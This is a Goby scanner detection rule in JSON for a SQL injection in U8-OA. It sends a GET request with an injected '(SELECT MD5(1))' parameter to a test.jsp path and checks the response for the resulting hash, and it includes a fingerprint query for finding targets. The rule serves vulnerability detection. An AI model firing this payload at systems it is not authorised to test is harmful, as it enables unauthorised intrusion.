Goby/json/U8_OA.json

53 lines
1.8 KiB
JSON

{
"Name": "U8-OA",
"Level": "3",
"Tags": [
"SQL Injection"
],
"GobyQuery": "body=\"U8-OA\"",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "c4ca4238a0b923820dcc509a6f75849b",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-25 10:46:03",
"GobyVersion": "1.8.239"
}